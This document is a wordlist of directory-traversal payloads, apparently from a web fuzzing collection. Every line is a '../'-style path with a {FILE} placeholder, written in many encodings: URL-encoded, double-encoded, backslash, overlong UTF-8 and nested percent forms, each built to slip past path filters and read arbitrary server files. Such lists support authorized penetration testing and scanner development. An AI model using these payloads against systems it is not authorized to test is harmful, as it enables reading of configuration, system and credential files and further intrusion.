# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
